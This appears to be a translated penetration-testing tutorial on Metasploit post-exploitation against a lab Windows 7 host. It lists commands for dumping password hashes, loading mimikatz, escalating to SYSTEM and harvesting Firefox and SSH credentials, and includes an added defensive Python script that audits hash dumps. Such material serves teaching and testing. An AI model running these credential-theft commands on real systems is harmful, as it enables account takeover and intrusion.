Intranet Penetration: Intranet Information Collection (3)
2022-07-06 14:29:00 【Unknown white hat】
Metasploit Intranet information collection
Attacker: Kali 192.168.0.103
Target machine: Win7 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump // requires a meterpreter session with SYSTEM privileges
set session 1
exploit // the results are stored under the tmp directory
use post/windows/gather/smart_hashdump
set session 1
exploit
Format:
User name:RID:LM-HASH value:NT-HASH value
The RID is a fixed value that corresponds to a Windows system account, similar to the uid and gid numbers on Linux: 500 is administrator, 501 is guest, and so on. The LM hash and the NT hash both encrypt the user's password, but the encryption method is different.
hashdump uses part of the functionality of mimikatz
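The record format described above can be checked from the defender's side. The following is an added example, not code from the original post: it parses lines in the User name:RID:LM-HASH:NT-HASH layout and reports which accounts are built-in (by RID), which still have an LM hash stored, and which have a blank password. The sample lines and the account names "alice" and "legacy_svc" are constructed, and tolerating trailing colons after the NT hash is an assumption about the export.

```python
import re

# Well-known values: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # means "no LM hash stored"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # means "password is blank"

# RIDs named on the page: 500 is administrator, 501 is guest.
WELL_KNOWN_RIDS = {500: "built-in administrator", 501: "built-in guest"}

# user:rid:lm:nt, optionally followed by trailing colons (assumption).
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):*$"
)

def parse_line(line):
    """Return (user, rid, lm, nt) or None if the line is not a hash record."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()

def audit(rid, lm, nt):
    """List the weaknesses visible from one record, without cracking anything."""
    findings = []
    if rid in WELL_KNOWN_RIDS:
        findings.append(WELL_KNOWN_RIDS[rid])
    if lm != EMPTY_LM:
        findings.append("LM hash stored")  # weak legacy format still enabled
    if nt == EMPTY_NT:
        findings.append("blank password")
    return findings

def audit_dump(text):
    """Map each account name to its findings; unparseable lines are skipped."""
    report = {}
    for line in text.splitlines():
        rec = parse_line(line)
        if rec:
            user, rid, lm, nt = rec
            report[user] = audit(rid, lm, nt)
    return report

# Constructed sample; the non-empty hash values are filler, not real hashes.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
legacy_svc:1002:11111111111111111111111111111111:22222222222222222222222222222222:::
[*] not a hash record
"""

if __name__ == "__main__":
    for user, findings in audit_dump(SAMPLE).items():
        print(user, findings or ["no findings"])
```

An account flagged "LM hash stored" means the host still keeps LM hashes; the Windows policy "Network security: Do not store LAN Manager hash value on next password change" stops new ones from being written.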
load mimikatz
wdigest, kerberos, msv, ssp, tspkg, livessp
mimikatz_command -h
mimikatz_command -f a:: // query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Privilege escalation for ordinary users
getuid
View user permissions
hashdump
Requires administrator permission
getsystem
On the surface this obtains administrator permission, but some real administrator privileges are still missing
ps
List the processes
getpid
View the current process
migrate
Process migration (migrate from an ordinary user's process to an administrator user's process)
hashdump
08 Other
Determine whether the target host is a virtual machine:
run checkvm
Get the software installation information on the target host:
run post/windows/gather/enum_applications
Get the most recently accessed documents and link information on the target host:
run post/windows/gather/dumplinks
View the target environment information:
run post/windows/gather/env
View the accounts and passwords stored in Firefox:
run post/windows/gather/firefox_creds
View the ciphertext of SSH account passwords and the certificate information:
run post/windows/gather/ssh_creds